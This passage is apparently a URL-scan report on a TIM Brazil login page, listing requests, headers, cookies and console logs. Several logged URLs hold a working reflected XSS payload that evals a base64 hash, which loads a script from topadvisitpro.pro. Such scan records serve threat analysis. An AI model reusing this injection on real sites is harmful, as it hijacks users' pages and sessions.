t%25253Eeval(atob(window.location.hash.substr(1)))%25253C%25252FScript%25253E%252525252FNCN%252525252Fredirect%252526paymentType%25253D2&dt=&en=OTA_MVR360_Wifi_Users&_fv=1&_nsi=1&_ss=1&tfd=5621
Requested by: Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtag/js?id=G-6QFBLT1GP2&l=dataLayer&cx=c
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2001:4860:4802:36::181 , United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software: Golfe2 /
Resource Hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

pragma: no-cache
date: Thu, 01 Feb 2024 21:31:39 GMT
server: Golfe2
content-type: text/plain
access-control-allow-origin: http://auth3.tim.com.br
cache-control: no-cache, no-store, must-revalidate
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

POST
H2 204 collect
stats.g.doubleclick.net/g/ 0
47 B 758ms
108ms Ping
text/plain 2607:f8b0:4004:c09::9b
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL: https://stats.g.doubleclick.net/g/collect?v=2&tid=G-6QFBLT1GP2&cid=1854977073.1706823099&gtm=45je41v0v9100858906z8813537120za200&aip=1&dma=0&gcd=11l1l1l1l1&npa=0
Requested by: Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtag/js?id=G-6QFBLT1GP2&l=dataLayer&cx=c
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2607:f8b0:4004:c09::9b Ashburn, United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software: Golfe2 /
Resource Hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

pragma: no-cache
date: Thu, 01 Feb 2024 21:31:39 GMT
server: Golfe2
content-type: text/plain
access-control-allow-origin: http://auth3.tim.com.br
cache-control: no-cache, no-store, must-revalidate
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

POST
H2 204 collect
analytics.google.com/g/ 0
254 B 664ms
45ms Ping
text/plain 2001:4860:4802:36::181
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL: https://analytics.google.com/g/collect?v=2&tid=G-6QFBLT1GP2&gtm=45je41v0v9100858906z8813537120za200&_p=1706823098583&gcd=11l1l1l1l1&npa=0&dma=0&cid=1854977073.1706823099&ul=en-us&sr=1600x1200&pscdl=noapi&_s=2&sid=1706823098&sct=1&seg=1&dl=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading%3Fbmctx%3DD1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C%26contextType%3Dexternal%26username%3Dstring%26enablePersistentLogin%3Dtrue%26password%3Dsecure_string%26challenge_url%3Dhttp%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fheloading%26request_id%3D8407358969913691941%26authn_try_count%3D0%26locale%3Duk_UA%26resource_url%3Dhttps%25253A%25252F%25252Fauth3.tim.com.br%25252Fv3%25252Faccesscontrol-web%25252Fhe%25253Fclient_id%25253Db4da3e0624b94cbabb4d4c82b84b3012%252526csp%25253D751%252526appid%25253D11657%252526msisdn%25253D16982527516%252526redirect_uri%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252525252FNCN%252525252Fcallback%252525252Fpending%252526SecureSessionId%25253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%252526campaignReturnURL%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252522%25253E%2500%2500%2500%2500%2500%2500%2500%25253CScript%25253Eeval(atob(window.location.hash.substr(1)))%25253C%25252FScript%25253E%252525252FNCN%252525252Fredirect%252526paymentType%25253D2&dt=&en=page_view&_et=4&tfd=5656
Requested by: Host: www.googletagmanager.com
URL: https://www.googletagmanager.com/gtag/js?id=G-6QFBLT1GP2&l=dataLayer&cx=c
Protocol: H2
Security: TLS 1.3, , AES_128_GCM
Server: 2001:4860:4802:36::181 , United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software: Golfe2 /
Resource Hash: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

pragma: no-cache
date: Thu, 01 Feb 2024 21:31:39 GMT
server: Golfe2
content-type: text/plain
access-control-allow-origin: http://auth3.tim.com.br
cache-control: no-cache, no-store, must-revalidate
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

POST
H2 200 collect Show response
www.google-analytics.com/j/ 3 B
208 B 43ms
40ms XHR
text/plain 2607:f8b0:4004:c06::8b
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.google-analytics.com/j/collect?v=1&_v=j101&a=1946358103&t=pageview&_s=1&dl=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading%3Fbmctx%3DD1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C%26contextType%3Dexternal%26username%3Dstring%26enablePersistentLogin%3Dtrue%26password%3Dsecure_string%26challenge_url%3Dhttp%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fheloading%26request_id%3D8407358969913691941%26authn_try_count%3D0%26locale%3Duk_UA%26resource_url%3Dhttps%25253A%25252F%25252Fauth3.tim.com.br%25252Fv3%25252Faccesscontrol-web%25252Fhe%25253Fclient_id%25253Db4da3e0624b94cbabb4d4c82b84b3012%252526csp%25253D751%252526appid%25253D11657%252526msisdn%25253D16982527516%252526redirect_uri%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252525252FNCN%252525252Fcallback%252525252Fpending%252526SecureSessionId%25253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%252526campaignReturnURL%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252522%25253E%2500%2500%2500%2500%2500%2500%2500%25253CScript%25253Eeval(atob(window.location.hash.substr(1)))%25253C%25252FScript%25253E%252525252FNCN%252525252Fredirect%252526paymentType%25253D2&ul=en-us&de=windows-1252&sd=24-bit&sr=1600x1200&vp=1600x1200&je=0&_u=YCDAgAABAAAAAC~&jid=1242078613&gjid=877516267&cid=1854977073.1706823099&tid=UA-155053615-4&_gid=702696086.1706823099&_slc=1&gtm=45He41v0n815R76V9Fv813537120za200&gcd=11l1l1l1l1&dma=0&z=978252296

Requested by

Host: www.google-analytics.com
URL: https://www.google-analytics.com/analytics.js

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2607:f8b0:4004:c06::8b Washington, United States, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Golfe2 /

Resource Hash

1cffc2b3146584685cd72751d7f28aa030ab9ae2f1bc78f2c27909f8d8287b26

Security Headers

Name	Value
X-Content-Type-Options	nosniff

Request headers

Referer
accept-language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36
Content-Type: text/plain

Response headers

pragma: no-cache
date: Thu, 01 Feb 2024 21:31:39 GMT
x-content-type-options: nosniff
last-modified: Sun, 17 May 1998 03:00:00 GMT
server: Golfe2
content-type: text/plain
access-control-allow-origin: http://auth3.tim.com.br
cache-control: no-cache, no-store, must-revalidate
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length: 3
expires: Fri, 01 Jan 1990 00:00:00 GMT

POST
H2 200 collect Show response
stats.g.doubleclick.net/j/ 2 B
347 B 674ms
106ms XHR
text/plain 2607:f8b0:4004:c09::9b
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-155053615-4&cid=1854977073.1706823099&jid=1242078613&gjid=877516267&_gid=702696086.1706823099&_u=YCDAgAABAAAAAG~&z=1206229107

Requested by

Host: www.google-analytics.com
URL: https://www.google-analytics.com/analytics.js

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2607:f8b0:4004:c09::9b Ashburn, United States, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Golfe2 /

Resource Hash

6068f86ff5e6d3a3e100e95fd0ab03a5fb9ebfca9386b2c0ee131361a62526c2

Security Headers

Name	Value
Strict-Transport-Security	max-age=10886400; includeSubDomains; preload
X-Content-Type-Options	nosniff

Request headers

Referer
accept-language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36
Content-Type: text/plain

Response headers

pragma: no-cache
strict-transport-security: max-age=10886400; includeSubDomains; preload
date: Thu, 01 Feb 2024 21:31:39 GMT
x-content-type-options: nosniff
last-modified: Sun, 17 May 1998 03:00:00 GMT
server: Golfe2
content-type: text/plain
access-control-allow-origin: http://auth3.tim.com.br
cache-control: no-cache, no-store, must-revalidate
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length: 2
expires: Fri, 01 Jan 1990 00:00:00 GMT

GET
H2 200 ga-audiences
www.google.com/ads/ 42 B
408 B 188ms
66ms Image
image/gif 2607:f8b0:4004:c08::68
GOOGLE

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://www.google.com/ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j101&tid=UA-155053615-4&cid=1854977073.1706823099&jid=1242078613&_u=YCDAgAABAAAAAG~&z=1252719217

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2607:f8b0:4004:c08::68 Ashburn, United States, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

accept-language: en-US,en;q=0.9
Referer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.139 Safari/537.36

Response headers

pragma: no-cache
date: Thu, 01 Feb 2024 21:31:39 GMT
x-content-type-options: nosniff
server: cafe
content-type: image/gif
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cache-control: no-cache, no-store, must-revalidate
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length: 42
x-xss-protection: 0
expires: Fri, 01 Jan 1990 00:00:00 GMT

GET

/
www.google.com/
Redirect Chain

https://google.com/
https://www.google.com/

0
0

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain: wap.dindo.com.br
URL: https://wap.dindo.com.br/newMobile/auth/tim/cns.css

Domain: wap.dindo.com.br
URL: https://wap.dindo.com.br/newMobile/auth/tim/header.aspx?s=25

Domain: www.google.com
URL: https://www.google.com/

Verdicts & Comments Add Verdict or Comment

29 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

11 Cookies

Cookies are little pieces of information stored in the browser of a user. Whenever a user visits the site again, he will also send his cookie values, thus allowing the website to re-identify him even if he changed locations. This is how permanent logins work.

Domain/Path	Expires	Name / Value
topadvisitpro.pro/lion/185fsdg	1969-12-31 23:59:59	Name: sess_60febad89698673fe37ef2ac Value: 6116747aed2d2c6e4b513e2f
topadvisitpro.pro/lion/185fsdg	1969-12-31 23:59:59	Name: __cf_bm Value: R5RSU_v7tGm0pfPQzrh3Bs0Sz8Q2b..jJNJ7o9F1qi4-1706823093-1-Ab6kRa7kubSryNc8KwphKHguEJO3O1d6Hb7WS72R%2FXyDz2mwq6zhdp292yh2APbzmhxVOsUjeLdatajOlb%2BlQXk
auth3.tim.com.br/	1969-12-31 23:59:59	Name: JSESSIONID Value: ZPBmlY94-6XAhF1Ylmaq0Akf80UsAw-3gm2n0dFeufYVz0V6hsqG!-1916179002
.tim.com.br/	1970-01-21 02:51:46	Name: visid_incap_2787765 Value: rC9quuLOQ1aI0mIGVe4n2rcNvGUAAAAAQUIPAAAAAAAWv7eehT6Le9VINQGyQyE1
.tim.com.br/	1969-12-31 23:59:59	Name: incap_ses_1352_2787765 Value: 7VYnZVLw1UlHK7ZiyEXDErcNvGUAAAAApGCgC/JahVNqmKt02JFPlw==
.tim.com.br/	1970-01-20 20:16:39	Name: _gcl_au Value: 1.1.698576307.1706823099
.tim.com.br/	1970-01-21 03:43:03	Name: _ga Value: GA1.1.1854977073.1706823099
.tim.com.br/	1970-01-21 03:43:03	Name: _ga_6QFBLT1GP2 Value: GS1.1.1706823098.1.1.1706823098.60.0.0
.auth3.tim.com.br/	1970-01-21 03:43:03	Name: _ga Value: GA1.4.1854977073.1706823099
.auth3.tim.com.br/	1970-01-20 18:08:29	Name: _gid Value: GA1.4.702696086.1706823099
.auth3.tim.com.br/	1970-01-20 18:07:03	Name: _dc_gtm_UA-155053615-4 Value: 1

23 Console Messages

A page may trigger messages to the console to be logged. These are often error messages about being unable to load a resource or execute a piece of JavaScript. Sometimes they also provide insight into the technology behind a website.

Source	Level	URL Text
network	error	URL: https://wap.dindo.com.br/newMobile/auth/tim/cns.css Message: Failed to load resource: net::ERR_NAME_NOT_RESOLVED
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jyc7bGluaz0nYUhSMGNEb3ZMM2QzZHk1MGFXMXdjbTl0YjNNdVkyOXRMbUp5TDA5VVFTMUNVbFJKVFMxS1QwdEZVaTlxYjJ0bGNuWnlNUzF3ZEMxa2Iya3RkMlZpUDBoRlMyVjVkMjl5WkQxUFZFRmZUVlpTWDBoQlJsOHhKblYwYlY5emIzVnlZMlU5YUdGbUpuVjBiVjl0WldScGRXMDlZM0JoSm5WMGJWOWpiMjUwWlc1MFBXcHZhMlZ5ZG5JeEpuVjBiVjlqWVcxd1lXbG5iajFQVkVGZlRWWlNYMGhCUmw4eExXaGhaaTEzWldJdFkzQmhMV3B2YTJWeWRuSXhMV2x0WVdkbEptaGhabDlwWkQwMk5XSmpNR1JpTldNM01EWTBPREF6TkRVMU56SXdZVEFtYUdGbVgzQjFZajB6TkRRPSc7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZChzKTs= Message: Third-party cookie will be blocked. Learn more in the Issues tab.
other	warning	URL: http://auth3.tim.com.br/v3/accesscontrol-web/heloading?bmctx=D1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C&contextType=external&username=string&enablePersistentLogin=true&password=secure_string&challenge_url=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading&request_id=8407358969913691941&authn_try_count=0&locale=uk_UA&resource_url=https%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fhe%253Fclient_id%253Db4da3e0624b94cbabb4d4c82b84b3012%2526csp%253D751%2526appid%253D11657%2526msisdn%253D16982527516%2526redirect_uri%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2525252FNCN%2525252Fcallback%2525252Fpending%2526SecureSessionId%253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%2526campaignReturnURL%253Dhttp%2525253A%2525252F%2525252Fwww.timpromos.com.br%2522%253E%00%00%00%00%00%00%00%253CScript%253Eeval(atob(window.location.hash.substr(1)))%253C%252FScript%253E%2525252FNCN%2525252Fredirect%2526paymentType%253D2#ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwgPSAnJzt2YXIgcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnR5cGU9J3RleHQvamF2YXNjcmlwdCc7cy5zcmM9Jy8vdG9wYWR2aXNpdHByby5wcm8vbGlvbi8yMjJnZGhqL3RlbXAuanMnO2lkQ2xpY2s9Jy